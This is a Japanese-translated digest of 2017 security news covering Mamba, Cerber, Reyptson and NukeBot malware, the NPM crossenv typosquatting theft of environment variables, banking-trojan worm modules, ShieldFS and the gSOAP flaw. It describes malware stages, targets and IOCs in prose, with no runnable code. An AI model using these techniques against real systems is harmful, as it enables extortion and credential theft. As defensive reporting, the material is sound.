     「例えば、これは、攻撃者が特権を昇格し、犠牲者のマシンに(永続的に)マルウェアをインストールする事を可能にする」、このエキスパートは続けて、「それ故、CVSSスコアは、この脆弱性が悪用された場合に発生する損害を完全に表現しているわけではない」と追加している。


    Mamba身代金要求型マルウェアが回帰
    Kaspersky : SecureList (2017/08/09)
     2016年末、San FranciscoのMunicipal Transportation Agency(サンフランシスコ市営鉄道)に対する大攻撃があった。この攻撃は、Mamba身代金要求型マルウェアを使用して実行された。この身代金要求型マルウェアは、ディスク全体を暗号化するための正当なユーティリティDiskCryptorを使用している。今月、我々は、この身代金要求型マルウェアの背後にいるグループが、企業に対する彼らの攻撃を再開したことに気がついた。

    攻撃されている国

     以下に位置する企業に対する攻撃を、我々は現在監視している。

    Brazil
    Saudi Arabia

    攻撃ベクトル

     通常通り、このグループは組織のネットワークへのアクセスを取得し、この身代金要求型マルウェアを実行するためにPsExecを使用する。また、犠牲者のネットワーク中の夫々のマシンに関し、この脅威の執行者が、DiskCryptorユーティリティ用のパスワードを生成することに言及することは重要である。このパスワードは、この身代金要求型マルウェア ドロッパーにコマンドライン引数を介して渡される。

    【訳者補注】 PsExec: PsExec は Telnet に代わる軽量のユーティリティで、クライアント ソフトウェアを手動でインストールしなくても、他のシステムでプロセスを実行できるだけでなく、コンソール アプリケーションとの十分な対話性も備わっています。PsExec の最も便利な用途には、たとえば、リモート システムで対話型のコマンド プロンプトを起動したり、ipconfig のようなリモートの実行に対応したツールを起動したりすることが挙げられます。PsExec で起動しない限り、そのようなツールにはリモート システムについての情報を表示する機能がありません。(Microsoft Technetより)


    マルウェア実行の例

    技術的解析

     一言で言えば、悪意ある挙動は二つのステージに分けることができる。

    Stage 1(準備):

      ・ フォルダ “C:\xampp\http“ を作成する
      ・ このフォルダにDiskCryptorコンポーネントをドロップする
      ・ DiskCryptorドライバをインストールする
      ・ DefragmentServiceと名付けられたシステムサービスを登録する
      ・ 犠牲者のマシンを再起動する

    Stage 2(暗号化):

      ・ MBR(マスターブートレコード)にブートローダーをセットアップし、DiskCryptorソフトウェアを使用してディスクパーティションを暗号化する
      ・ クリーンアップ
      ・ 犠牲者のマシンを再起動する

    Stage 1(準備)

     このトロイがDiskCryptorユーティリティを使用している時、第一段階は、犠牲者のマシンにこのツールをインストールする処理である。この悪意あるドロッパーは、彼ら独自のリソース中にDiskCryptorのモジュールを格納する。


    DiskCryptorモジュール

     OS情報により、このマルウェアは、32もしくは64bitのDiskCryptorモジュールを選択することができるようになっている。この必須のモジュールは、"C:\xampp\http"フォルダにドロップされる。


    このマルウェアは必須のモジュールをドロップする

     その後、ドロップされたDiskCryptorインストーラを起動する。


    DiskCryptorインストーラの呼び出し

     DiskCryptorがインストールされると、このマルウェアは、SERVICE_ALL_ACCESS と SERVICE_AUTO_START パラメータを持つサービスを作成する。


    悪意あるサービス関数の作成

     Stage 1の最後のステップは、このシステムを再起動することである。


    強制再起動関数

    Stage 2(暗号化)

     DiskCryptorソフトウェアを使用することで、このマルウェアは、新しいブートローダをMBRにセットアップする。


    MBRにブートローダーをセットアップするためのコール

     このブートローダーは犠牲者用の脅迫文を含んでいる。


    脅迫文

     このブートローダーが設定されると、ディスクパーティションは、ドロッパー用のコマンドライン引数として今迄に特定されていたパスワードを使用して暗号化されるだろう。


    暗号化プロセスのCall Tree(コールツリー)

     暗号化が終了すると、このシステムは再起動される、そして、犠牲者はこの画面上に脅迫文を見るだろう。


    脅迫文

     Kaspersky Lab製品は、以下の決定(PDM:Trojan.Win32.Generic)でSystem Watcherの支援を得て、この脅威を検出する。

    復号

     残念なことに、この正当なDiskCryptorユーティリティは、強力な暗号化アルゴリズムを使用しているために、このユーティリティを使用して暗号化されたデータを復号する方法は存在しない。

    IOCs

    79ED93DF3BEC7CD95CE60E6EE35F46A1


    MicrosoftがOutlookとOffice用の定例外アップデートをリリースしている
    Sophos : NakedSecurity (2017/08/07)
     あなたは、7月の全てのMicrosoft Officeのアップデートを引っ掴んできているだろうか?
     Microsoftは7月11日のアップデート(以前、そして依然としてPatch Tuesday(パッチの火曜日)として知られている)で多数のセキュリティパッチをリリースしたが、幾つかの定例外アップデートが7月27日にリリースされている。このアップデートは、具体的にはOutlookとOfficeのClick-to-run(クイック実行。【訳注】 Office をインストールするための時間を短縮し、複数のバージョンの Office を同じコンピューター上で実行できるように支援するMicrosoft のストリーミングおよび仮想化のテクノロジ(Microsoft Technetより))の脆弱性に適用されるものである。
     幾つかの脆弱性(Outlook 2007, 2010, 2013, 2016,並びに Office 2010, 2016のClick-To-Runにおけるリモートコード実行(RCE))は、7月後半のアップデートで阻止された。
     「このセキュリティアップデートは、ユーザーが、取り分け巧みに細工されたOfficeファイルを開いた場合に、リモートコード実行を可能にしていたMicrosoft Office中の脆弱性を解決する」と、Microsoftは彼らのセキュリティアップデートに記述している。
     具体的には、問題のパッチされたRCE脆弱性は、CVE-2017-8571, CVE-2017-8572, CVE-2017-8663である。
     相も変わらずであるが、我々はいつも通り、可能な限り、これらのアップデートを適用するよう推奨する。攻撃者は、可能な、しなければならないアップデートを全ての者が実行しているわけではないことを認識しているので、これらの脆弱性を利用してくる。Microsoft Officeは、依然としてメジャーな攻撃ベクトルである。そして残念なことに、我々は始終、Officeユーザが攻撃者のターゲットになっていることを見ている。これは悲しいことにOfficeユーザにとって立証済みのことである。
     攻撃者の仕事を必要以上に簡単にしてはならない。出来る限り早急に、これらのパッチを適用しなさい。


    Cerber身代金要求型マルウェアは、今やブラウザパスワード、Bitcoinウォレットデータを盗む
    BleepingComputer : News>Security (2017/08/04)


     Cerber身代金要求型マルウェアは、Infostealer(【訳注】 侵入先のコンピュータから機密情報を収集する有害なソフトウェア(Symantec日本より))のように、犠牲者のコンピュータからデータを収集し盗むことを可能にするアップデートを受け取った。
     Trend Microの二人の研究者Gilbert SisonとJanus Agcaoiliによると、Cerber身代金要求型マルウェアの一番最近のバージョンは、ブラウザパスワードをダンプし、Bitcoinウォレットに関連したファイルを盗むことができるようになっている。

    CerberはInfostealer機能を追加した

     より正確には、Cerberは、Internet Explorer, Google Chrome, Mozilla Firefoxのようなブラウザ中に格納されているパスワードをダンプする。
     更に、Cerberは、三つのBitcoinウォレット アプリケーションに関連したデータファイルを探す。Cerberは検索し、そして、wallet.dat(公式のBitcoin Coreウォレットによって使用される)、 *.wallet(Multibitウォレット アプリケーションによって使用される)、electrum.dat(Electrumウォレット アプリケーションによって使用される)と名付けられたファイルを盗みだす。
     ユーザのブラウザから抽出されたブラウザパスワードは、オンラインアカウントを奪取する役に立つだろうが、Bitcoinウォレット データは、あまり役に立たないかもしれない。
     これらのファイルの全てが、ターゲットのBitcoinウォレットにアクセスするためのパスワードを格納しているわけではない。更に、2013年以来、Electrumアプリケーションは、最早、ウォレット情報を格納するためにelectrum.datファイルを使用していない。これは、Cerberの仲間が、らInfostealerの機能をサポートするために必要とされるコードを、その実際の効果を認識することなく、他のプロジェクトからコピー&ペーストした可能性を示している。
     「この新しい機能は、攻撃者が、身代金要求型マルウェアを収益化するための新しい方法を試していることを示している」とし、「ターゲットのユーザのBitcoinを盗むことは、潜在的な収入の貴重な源となる」と、この二人の研究者は発言している。

    Cerberが初めてではない

     CerberがInfostealer機能を搭載した最初の身代金要求型マルウェアではない。最初のものは、2015年4月にFireEyeによって停止させられた、Kriptovorと名付けられた身代金要求型マルウェア ファミリーである。
     一年後、CryptXXX身代金要求型マルウェアもBitcoinウォレットデータを盗み、その後、ブラウザ認証をダンプするためのサポートを追加した。

    SHA256 hash: 6c9f7b72c39ae7d11f12dd5dc3fb70eb6c2263eaefea1ff06aa88945875daf27


    NPMへのタイポスクワッティング攻撃は2週間未検出のままだった
    The Register : Security (2017/08/02)
     NPM(Node.jsパッケージ マネージメント レジストリ)を介して拡散された悪意あるコードを使用して開発者の認証を盗むための過去2週間のキャンペーンは、39の悪意あるNPMパッケージを削除することで停止された。
     開発者達は、一般的機能を実装するためにNode.jsアプリケーションにこれらのJavaScriptコードのバンドルを定期的に追加している。そこで、彼ら自身がコードを記述する必要がなくなる。
     水曜日に公開されたブログへの投稿に於いて、CJ Silverio(NPMのCTO)は、7月19日から31日までの間、アカウント名hacktaskが、人気のある既存のNPMパッケージに類似している名前の一連のパッケージを公開することでタイポスクワッティング攻撃を実施していたと発言している。
     「今迄、これは殆ど偶発的なものであった」、「幾許かのケースに於いて、我々は、既存のパッケージと競争しているライブラリの著者による故意のタイポスクワッティングを確認してきた。今回、このパッケージのネーミングは、故意と悪意(欺かれたユーザから有用なデータを収集することを目的とする)の両方である」と、Silverioは発言している。
     スウェーデンを拠点とする開発者Oscar Bolmstenは、環境変数を設定するための人気あるスクリプトであるcross-envを検索した人々をペテンに掛けるように設計されたcrossenvと名付けられたパッケージに悪意あるコードを発見した
     「環境変数は、ソフトウェアに認証を渡すための方法として大変一般的であるために、追跡するには大変適切なものである」と、SilverioはThe Registerとの電話インタービューで発言している。
     環境変数は、他のこと(アカウント名、パスワード、トークン、そして、アプリケーション、クラウドサービス、APIにアクセスを提供するキーの格納)にも使用されている。
     今回の場合、この悪意あるコードは、犠牲者のマシンに設定されているあらゆる環境変数をコピーし、それらを攻撃者のコントロールサーバーnpm.hacktask.netに転送することを企てていた。
     crossenvに使用されていたJSON設定ファイルは、package-setup.jsと名付けられたスクリプトを実行する。これは、既存の環境変数を文字列に変換し、次にPOSTリクエストを介して、そのデータを送信する。
     Silverioによると、hacktaskによって登録された「約40」のパッケージは、NPMから削除された。Lift Securityが、不正なパッケージ セットアップコードに関して全てのNPMパッケージをスキャンしたが、他に発見されたものはなかったと、彼女は発言している。
     Silverioは、この攻撃が大変巧みに動作したことへの懸念を口にしている。人々は、検索や公開されたコードをコピー&ペーストすることに依存する傾向にあると指摘しながら、「タイポスクワッティングは、結局のところ、マルウェアがレジストリを取得するための効果的な方法ではない」と、彼女は発言している。
     NPMがhacktaskにリンクしていた39のパッケージの中の殆どは、7月半ば以降、マルウェアの言葉の出現に興味を抱いてダウンロードされた急増部分を除くと、夫々およそ40ダウンロードされている。悪意あるcrossenvパッケージが最もダウンロード(700ダウンロード)されていた。しかし、これらの大部分は、NPMミラーサーバにによって引き起こされた自動ダウンロードであると信じられている。
     Silverioは、公開されていた期間に悪意あるcrossenvパッケージをダウンロードした人々は、およそ50人であると見積もっている。彼女は、この事件の結果としてアカウントが改竄されたと通知してきた開発者は存在しないと発言している。
     GitHubレポジトリの検索は、悪意あるcrossenvパッケージに対する僅かな参照を返してくる。
     このhacktaskアカウントは締め出されたが、この者やこのアカウントの背後にいる者は、公に同定されていない。
     他の誰かが、異なるアカウント名の下で同様の攻撃を実施することを阻止するための方策を、NPMが配備したか否かの質問に対して、Silverioは、攻撃は、多分即時に捕獲されることはないと認めた。
     「我々は、公開の瞬間でその全てを捕獲できなくとも、我々は、かなり良く動作するシステムを持っている」と、NPMコミュニティの警戒システムを賞賛しながら、彼女は発言している。
     それでもなお、彼女のブログへの投稿に於いて、Silverioは、NPMが、今後のタイポスクワッティングを阻止するために、パッケージ中で類似の名前を同定する方法を調査していると発言している。この会社はまた、レジストリに発表されたスパムを検出するためにセキュリティ企業Smyteと共同作業している。明らかに、スパマーは、Webサイトの検索ランキングを押し上げるために、READMEファイルが検索エンジンによってインデックス化されることを希望してパッケージを公開している。
     Node.jsセキュリティに関するKiwicon(【訳注】 2007年以来ニュージーランドのウェリントンで開催されているコンピュータ・セキュリティ・カンファレンス(Wikipediaより))での2016年のプレゼンテーションで、開発者Jeff Andrewsは、「私はNode.js/npmを使用している。どうすれば私は安全でいられるか?」という質問を彼自身に提示した。彼の答えは、「あなたは、できない。」であった。


    バンキング・トロイは自己拡散型ワーム コンポーネントを追加している
    BleepingComputer : News>Security (2017/07/28)
     バンキング・トロイ(Emotet と Trickbot)は、同じネットワーク上の他の犠牲者に感染するチャンスを向上させるために自己拡散コンポーネントのサポートを追加した。
     これは、最近までバンキング・トロイは自己拡散モジュールを搭載しておらず、主に検出されずに生き残ることや、犠牲者への警告なしにユーザ認証を収集することに焦点をあてていたために、これは何かしら新しいものである。
     我々が今日のマルウェア中にワーム コンポーネントの復活を確認したのは、WannaCry身代金要求型マルウェアと、それに続くNotPatyaの成功を受けた後だけである。

    Emotet

     自己拡散コンポーネントを最初に呼び物にしたのは、Emotetトロイである。FidelisBarklyの研究者によって発見されたこのバンキング・トロイは、自己拡散用のRARファイルを感染したホストに投下し、これを検索に使用し、感染したホストのログインをブルートフォースすることによってローカルネットワーク リソースへのアクセスを取得する。
     ネットワーク内部を横断的に移動するためのEmotetの自己拡散コンポーネントを、eMailクライアントから連絡帳を抽出し、各犠牲者に悪意あるeMailをスパムすることに依存する増殖モジュールと混同してはならない。
     このバンキング・トロイは、今日の最も能動的な脅威の一つである。そして、銀行の認証を収集し、不正なMitB(Man-in-the-Browser、【訳注】 マルウェアがネットバンキングユーザーの端末上のWebブラウザを乗っ取り、アカウント情報を盗み見たり、ブラウザ上の画面を書き換えることで送金情報を変更してしまうといったもの。日本でも2012年の10月以降、様々な金融機関で被害が確認されている(FFRIより))攻撃を使用して銀行口座から金銭を盗むために犯罪者を支援するものでもある。このトロイはまた、ソーシャルメディア・アカウント用の認証も収集したり、感染したホストに他のマルウェアを投下する(言うなれば、マルウェア ダウンローダとして動作する)ためにも使用されている。

    TrickBot

     自己拡散するワームのようなモジュールの誇示を発見された二つ目のバンキング・トロイは、先月WebベースのCRMSとPayPalユーザをターゲットにするように拡張されたTrickBotである。
     TrickBotは、巨大なNucursボットネット経由で送信されるスパムを介して拡散することが確認されている。そして、先週発見されたサンプルは、同じネットワーク上の手近なコンピュータに、このトロイを拡散するように設計されている新しいSMBワームを含んでいた。
     FlashpointDeloitteの研究者によって発見されたこのモジュールは、NetServerEnum Windows APIを介してサーバのリストがないかドメインを詳しく調べ、Lightweight Directory Access Protocol (LDAP)を介して他のコンピュータを列挙する。
     Research Vitali KremezのFlashpointディレクターからの朗報は、このSMBモジュールが未だ完全に実装されていないように思われることである。
     悪いニュースは、TrickBotの作成者は、定期的にその能力を絶えず拡大させているので、SMBワームがアップされ実行されるまで、時間はかからないことを意味している。
     数年間、ワームは滅亡したかのように思われていた。WannaCryとNotPetya身代金要求型マルウェアの大流行は、ワームが最初の段階で成功する理由をサイバー犯罪者に示した。マルウェア研究者の間での一致した意見は、近い将来、危険なマルウェア(バンキング・トロイや身代金要求型マルウェア)のDefault設定に自己拡散型ワームを配備するマルウェアの増加を見るだろうということである。

    Kevin BeaumontのTwitterへのリンク


    ShieldFSは、身代金要求型マルウェア感染の効果を停止し復帰させることができる
    BleepingComputer : News>Security (2017/07/27)
     イタリアの研究者達が、身代金要求型マルウェア感染の明瞭な証拠を検出し、あらゆる悪意ある行動を停止し、どのような暗号化されたファイルでさえ以前の状態に戻す能力のあるWindowsドロップ-イン・ドライバとカスタム ファイルシステムを開発した。
     ShieldFSと呼ばれるこの新しいプロジェクトは、ミラノ工科大学出身の7人の研究者の仕事であり、昨日、Black Hat USA 2017セキュリティ カンファレンスで詳細に説明された。

    ShieldFSはCOW(Copy-On-Write)と暗号化操作のスキャナとして働く

     今年公開された二つの研究論文[1, 2]によると、ShieldFSは、Copy-On-Write(COW、書き換え時コピー。【訳注】 子プロセス生成時に親プロセスのメモリー空間を複製せず,書き込み処理が発生したときにはじめて複製する仕組み(ITproより))操作を検出するように設計された複雑なメカニズムである。
     COW操作は、アプリケーションがファイルを取得し、それをコピーし、修正した後、オリジナル ファイルを置き換える時に発生する。今日の殆どの身代金要求型マルウェア・ファミリーは、オリジナルのファイルを取得し、そのコンテンツを暗号化し、そのオリジナルを(【訳者挿入】 暗号化したファイルで)置き換えるので、COW操作に依存している。
     ShieldFSは、COW操作を検出するだけでなく、しばしばファイル暗号化プロセス中で使用されるシンメトリック暗号(【訳注】 対象暗号。暗号化及び復号に同じ鍵を利用する暗号)プリミティブの使用を探す。
     ShieldFSは、これらの制限に適合するイベントを検出すると、内部挙動モデルに問い合わせ、悪意ある身代金要求型マルウェアと潔白なプロセスを識別する。
     研究者達によると、ShieldFSは現在2245の正当なアプリケーションの適用モデルが用意されており、正当なプロセスをブロックする結果をもたらす可能性のある誤検出は殆ど無しに動作することが可能である。

    ShieldFSは自己回復ファイルシステムを使用して暗号化されたファイルを復元する

     身代金要求型マルウェアが検出されると、ShieldFSは、そのプロセスを停止するように、そのオペレーティングシステムに信号を送る。そして、あらゆる身代金要求型マルウェアの悪意あるアクションを元に戻すためのカスタム ファイルシステムを使用している。
     技術レベルでは、これは、ShieldFSが特定の量のファイルを復元することを可能にするために、COW操作を遮断し、短期間オリジナルのファイルのコピーを維持するように設計されたカスタム仮想ファイルシステムをインストールするドロップ-イン・ドライバとしてパッケージされているので、可能である。
     ShieldFSリアルタイムと自己回復ファイルシステムは、殆どの身代金要求型マルウェア ファミリーが、特化されたデータ リカバリ ソフトウェアを介してファイルの復元を防ぐために、それらがユーザのファイルを暗号化した後、必ず削除するシャドー ボリューム コピーの代替として働くとも言える。
     以下は、活動中のShieldFSのビデオである。研究者達は、依然としてこのプロジェクトで作業しているが、彼等は、近い将来にShieldFSの完全版を公式にリリースする計画があると発言している。Black Hatカンファレンスでのプレゼンテーションは、コチラ(PDFフォーマット)から利用できる

    活動中のShieldFSのビデオ:https://youtu.be/0UlgdnQQaLM


    オープンソース ソフトウェア ライブラリの欠陥により、数百万のIoTデバイスにハッキングされる可能性
    Bitdefender : blog>IoT News (2017/07/19)
     世界中でインターネットに接続されている数百万のデバイスに、バグだらけのソフトウェア ライブラリが使用されていることが明らかになった後、今一度質問されたことは、IoTのセキュリティに関することである。
     このバッファオーバーフローの脆弱性を「悪魔の蔦」と名付けた研究者達は、このソフトウェアのフローがIPカメラに対して悪用できる一つの方法として、遠隔からビデオ画像にアクセスしたり、あるいは、真の所有者がビデオ画像にアクセスすることを拒否することができるようになるだろうと説明している。
     要するに、想像しやすくするためにハリウッドの強盗映画で発生しているシーンを思い浮かべよう、犯罪者は、ハッキングしたカメラを閲覧して重要な情報を収集したり、実際の犯罪を監視できないようにしている。
     このフロー自体は、gSOAP中に存在している。gSOAPは、インターネットを介してコミュニケートする能力を彼等の製品に提供するためのコード ライブラリを素早く簡単に彼等の製品に組み込みたい開発者によって百万回もダウンロードされているオープンソース ツールキットである。
     そのコードがキチンと書かれていたなら、同じサードパーティーに依存するという多くの異なるデバイスのコンセプトは、必ずしも悪いわけではない。悲しいことに、gSOAPの場合は、そうではなかったようである。
     そして、それは現在大きな意義が存在していることを意味している。Geniva(gSOAPを後押ししている企業)は、そのコードに関するパッチをリリースしたが、これは、gSOAPのバグだらけのバージョンを内部に埋め込まれている無数のIoTデバイスをパッチするわけではない。
     この問題はサプライチェーンを破壊することである。
     この問題のライフサイクルを考えよう。

     - IoTデバイス メーカーは、彼等の製品に或るIoTコードを含める必要がある。そのコードの全てを自分達で記述する代わりに、彼等はサードパーティーのgSOAPライブラリをダウンロードした。
     - IoTデバイス メーカーは、世界中にgSOAPコードを含むデバイスを販売している。
     - 数百の他のメーカーも、同じことを実行している。まもなく、数百万のデバイスが、このgSOAPコードを信頼することになる。
     - セキュリティ研究者が、gSOAPコード中に、悪意あるハッカーによって悪用される虞のある弱点を発見する。
     - zSOAPは、この脆弱性を修正するためにパッチされる。
     - ...するという間違いを犯す。

     理想世界に於いては、全てのメーカーは脆弱性をアナウンスし、彼等製品の将来のバージョンに修正されたコードを具現化し、彼等がすでに販売した製品を遠隔からパッチするように振る舞うだろう。
     しかしながら、IoTの世界は理想から程遠い存在である。メーカーは、倒産するかもしれないし、すでに販売した製品の修正を構築するために金銭、時間、リソースを費やすことに興味がないかもしれないし、最早サポートに興味がないかもしれない。IoT製品の一部は、アップデートを受け取るための基盤構造を何ら持っていない場合さえある(聞くとゾッとするが真実である)。
    あなたは? 気の毒な消費者は、IoT製品がgSOAPを含んでいるのかいないのかさえ認識していない。従って、それが、あなたのIoTデバイスに出現した時に、あなたが統率のとれたセキュリティワイズの実行を切望するなら、あなたは、信頼しているデバイスに悪用のリスクが存在していることを単に忘れている。
     時々、開発者は、彼等の製品中に新しい危険を導入するかもしれないサードパーティーのコードを含めるか否かの調査をすることもなく、サードパーティーのコードを過剰に信頼していると、私は思っている。オープンソースコードの背景にある考え方は、素晴らしい考えであり、多くの目が、そこに脆弱性があるか否か決定するために、そのコードを検証することができるが、これは、誰かが検証に手こずっている場合だけの仕事である。
     企業やホームユーザはどうか? 常に、どのデバイスが公共のインターネットに晒されているのかということについて細やかな注意を払いなさい。可能なら、ハッカーが遠隔からそれらを悪用することを難しくするために、ファイアーウォールの背後にそれらを配置しなさい。そして常に、あなたが購入したIoT製品のベンダーが、真面目にセキュリティに向き合い、このような深刻な問題が発見された時に素早く適切な対応の歴史を持っているか否か検討しなさい。


    NukeBotバンキング・トロイが現実の脅威に
    Kaspersky : SecureList (2017/07/19)
     今春、NukeBotバンキング・トロイの制作者は、彼の作成物のソースコードを公開した。彼は、十中八九幾つかのハッカーフォーラムでの彼の評価を復活させるためであったと思われる。以前、彼は自身の開発したものを積極的に奨励し、常軌を逸した態度をとっていたので、結局、彼はスカマーではないかと疑われた。ソースコードの公開から3ヶ月経った現在、我々は、このバンキング マルウェアの状況にどのような変化があるのかを検証することにした。

    実環境中のNukeBot

     マルウェアのソースコードの公開は、珍しいことではないかもしれないが、依然としてITコミュニティの注意を惹くものであり、その幾許かの関心は通常、コードの調査を超えるものである。NukeBotのケースも例外ではなかった。我々は、このトロイのコンパイルされた幾つかのサンプルをどうにか手にすることができた。それらの大部分は、興味を惹くものではなかった(ローカルサブネットアドレスのままであったり、あるいはC&Cアドレスとして'localhost/127.0.0.1'のままだった)。大変僅かなサンプルが、「真」のアドレスを持ち、「操作可能」であった。このバンキング・トロイのメインの機能は、ユーザのデータを盗むために特定のページにWebインジェクションを実行することであるが、オペレーショナル・サーバからでさえ、我々は、例のようなソースコード中に含まれる'test'インジェクションを受け取っただけだった。


    NukeBotソースコードからのtestインジェクション(画像をクリックすると拡大します)

     我々が手に入れたNukeBotのサンプルは二つの主なタイプに分けることができる。一つはプレーンテキスト文字列のものであり、他の一つは暗号化された文字列のものである。このテストサンプルは一般的にタイプ1に属しているので、我々は、何の問題もなくC&Cアドレスと、このトロイのボディーから解析に要求される他の情報を抽出した。暗号化されたバージョンでは、これは多少複雑であった。暗号キーが最初に抽出される必要があり、その後でなければ、構築されている文字列の値が取得できないためである。当然ながら、上述のことは全て、我々が開発したスクリプトを使用して自動的に実行された。データそれ自体は、実行の冒頭でコールされるこのトロイの唯一のプロシージャ中に集まっていた


    プレーンテキストと暗号された文字列の初期化プロシージャの比較(画像をクリックすると拡大します)

     復号(スクリーンショット中のsub_4049F6関数)はキーをXORすることで実行される


    Pythonで実装されている復号された文字列

     Webインジェクションのトリガーに関して、我々はC&Cサーバとの対話を模倣する必要があった。C&Cアドレスは初期化プロシージャの文字列から取得できた。
     このC&Cと最初に接続した時、このBotは復号インジェクションに使用するRC4キーを送信された。我々は模倣Botを実装する時に、この単純なロジックを使用し、多数のサーバからWebインジェクションをなんとか収集することができた。
     当初、この大多数のボットネットは、我々にとって関心のないテスト インジェクションを受け取るだけであった。しかしながら、その後、我々は幾つかの「戦闘バージョン」のNukeBotを同定した。我々が取得したインジェクションの解析に基づき、我々は、このサイバー犯罪者の主たるターゲットがフランスと米国の銀行であると推測している。


    「戦闘グレード」Webインジェクションの例(画像をクリックすると拡大します)

     我々が取得したこのトロイの全サンプルの内、2-5%が「戦闘グレード」である。しかしながら、これらのバージョンが、数人のやる気のあるサイバー犯罪者によって作成されたものなのか、NukeBotの使用が直ぐに衰えるものなのか、あるいは、このソースコードが組織(もしくはグループ)の手に落ち、幾つかの戦闘グレードのサンプルが増えていくのか、定かではない。我々は、この状況を監視することを継続するだろう。
     我々はまた、Webインジェクション機能を持っていないが、メールクライアントとブラウザのパスワードを盗むように設計された幾つかのNukeBotの修正版を検出した。我々は、ドロッパー内部のこれらのサンプルを独占的に受け取った。その後解凍されたそれらのサンプルは、リモートの悪意あるサーバーから要求されるユーティリティ(「eMailパスワード・リカバリ」のような)をダウンロードした。
     Kaspersky Labの製品は、このNukeBotファミリーのバンキング・トロイをTrojan-Banker.Win32.TinyNukeとして検出する。このバンキング・トロイに含まれているドロッパーは、Trojan-PSW.Win32.TinyNukeを割り当てられている。

    MD5

    626438C88642AFB21D2C3466B30F2312
    697A7037D30D8412DF6A796A3297F37E
    031A8139F1E0F8802FF55BACE423284F
    93B14905D3B8FE67C2D552A85F06DEC9
    A06A16BD77A0FCB95C2C4321BE0D2B26
    0633024162D9096794324094935C62C0
    9E469E1ADF9AAE06BAE6017A392B4AA9
    078AA893C6963AAC76B63018EE4ECBD3
    44230DB078D5F1AEB7AD844590DDC13E
    FAF24FC768C43B95C744DDE551D1E191
    8EBEC2892D033DA58A8082C0C949C718
    6DC91FC2157A9504ABB883110AF90CC9
    36EB9BDEFB3899531BA49DB65CE9894D
    D2F56D6132F4B6CA38B906DACBC28AC7
    79E6F689EECB8208869D37EA3AF8A7CA
    9831B1092D9ACAEB30351E1DB30E8521


    Reyptson身代金要求型マルウェアは、Thunderbirdのアドレス帳を盗むことであなたの友人にスパムしている
    BleepingComputer : News>Security (2017/07/17)
     週末に渡り、Emsisoftのセキュリティ研究者xXToffeeXxが、スペイン人をターゲットにしたReptsonと呼ばれる新しい身代金要求型マルウェアを発見した。それ以来、我々は、この身代金要求型マルウェアの増強された能力を調べてきた。本日、セキュリティ研究者MalwareHunterTeamは詳細に調査し、Reyptsonが、犠牲者の設定したThunderbird eMailアカウントから直接、独自のスパム拡散キャンペーンを実施していることに気がついた
     これは、今までの身代金要求方マルウェアには見られなかった新しい機能である。そこで私は、我々が発見したことを確認するために、この身代金要求型マルウェアの内部をより詳細に調べることにした。Reyptson身代金要求型マルウェアに感染した人々に関しては、残念ながら、現在、無料でこの身代金要求型マルウェアを復号する方法は存在していない。しかしながら、我々は、この身代金要求型マルウェアについて論議したり質問したい人々のために、専用のReyptson Support & Help Topicを立ち上げた。

    Reyptsonは、犠牲者のThunderbirdアドレス帳をスパムすることで拡散している

     私が記憶している他の身代金要求型マルウェアと異なり、Reyptsonは、犠牲者のコンピュータから実施されるスパムeMailキャンペーンを介して、それ自身を拡散させる能力を持っている。この身代金要求型マルウェアは、Thunderbird eMailクライアントがインストールされているか否かをチェックすることで、これを実行する。そして、Thunderbirdがインスト−すされているのであれば、犠牲者のeMail認証とアドレス帳を読み込もうとする。


    Thunderbirdアドレス帳へのアクセス(画像をクリックすると拡大します)

     アドレス帳と認証を取得できたなら、この身代金要求型マルウェアは、犠牲者のアドレス帳にインチキの送り状を送信するスパムキャンペーンを開始する。


    スパム拡散(画像をクリックすると拡大します)

     これらのスパムeMailは、Folcan S.L. Facturacion(oは、oにアクセント)の件名を持ち、インチキの送り状を含んでいる。この送り状は、スペイン語で書かれており、送り状をダウンロードするにはリンクをクリックするように受取人に告げている。受取人が、このリンクをクリックすると、factura.pdf.rarと名付けられた、ファイル(実行ファイルを含む)をダウンロードする。この実行ファイルが開かれると、ユーザは、この身代金要求型マルウェアで感染させられることになる。


    送信されるeMail(画像をクリックすると拡大します)

    Reyptson身代金要求型マルウェアがコンピュータを暗号化している方法

     犠牲者がReptson身代金要求型マルウェアを実行したのだが、犠牲者はPDF送り状を開いていると思い込んでいる。開いてしまうと、この身代金要求型マルウェアは、リモート コマンド&コントロール サーバ(以下、C2)に接続し、システムのボリュームシリアル番号(【訳注】 Windowsが、1つのディスクを複数の異なるドライブのように使うためのボリュームを識別するために付ける一意の番号(コトバンクより))、犠牲者のログイン名、現在時刻のミリ秒の値で構成される一意のID文字列を送信する。
     このリクエストを送信している時、この身代金要求型マルウェアはまた、UJBTFityの名前とKuyfibvUYFOUygonULIHLuhgoYUHGVの値でクッキーを設定し、同様に、C2サーバにこれを送信する。このクッキーが何に使用されるのかは不明であるが、おそらくRaaS実装用のアフィリエイトIDだろうか?
     そこでC2は、暗号化パスワードと、犠牲者が支払い用サーバにログインするために使用するユーザ名とパスワードで構成される文字列を戻してくる。
     この身代金要求型マルウェアが、この情報を受け取ると、以下の拡張子を含むファイルを検索することで犠牲者のコンピュータの暗号化を開始する。

    .doc, .dot, .wbk, .docx, .docm, .dotx, .dotm, .docb, .xls, .xlt, .xlm, .xlsx, .xlsm,
    .xltx, .xltm, .xlsb, .xla, .xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx,
    .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm, .accdb, .db, .accde, .accdt, .accdr, .pdf,
    .ani, .anim, .apng, .art, .bmp, .bpg, .bsave, .cal, .cin, .cpc, .cpt, .dds, .dpx,
    .ecw, .exr, .fits, .flic, .flif, .fpx, .gif, .hdri, .hevc, .icer, .icns, .ico, .cur,
    .ics, .ilbm, .jbig, .jbig2, .jng, .jpeg, .jpeg, .2000, .jpeg-ls, .jpeg, .xr, .kra,
    .mng, .miff, .nrrd, .ora, .pam, .pbm, .pgm, .ppm, .pnm, .pcx, .pgf, .pictor, .png,
    .psd, .psb, .psp, .qtvr, .ras, .rbe, .jpeg-hdr, .logluv, .tiff, .sgi, .tga,
    .tiff, .tiff, .ufo, .ufp, .wbmp, .webp, .xbm, .xcf, .xpm, .xwd, .cpp, .h, .cs,
    .sln, .idb, .txt, .dat

     一致するファイルに遭遇し、孫ファイルが以下のフォルダの一つに存在していなければ、この身代金要求型マルウェアは、AES-128暗号化を使用して暗号化する。

    c:\windows, c:\windows.old, c:\users\default, c:\users\all users, c:\users\public,
    c:\program files, c:\$recycle.bin, c:\program files (x86), c:\programdata,
    c:\system volume information, %UserProfile%\appdata

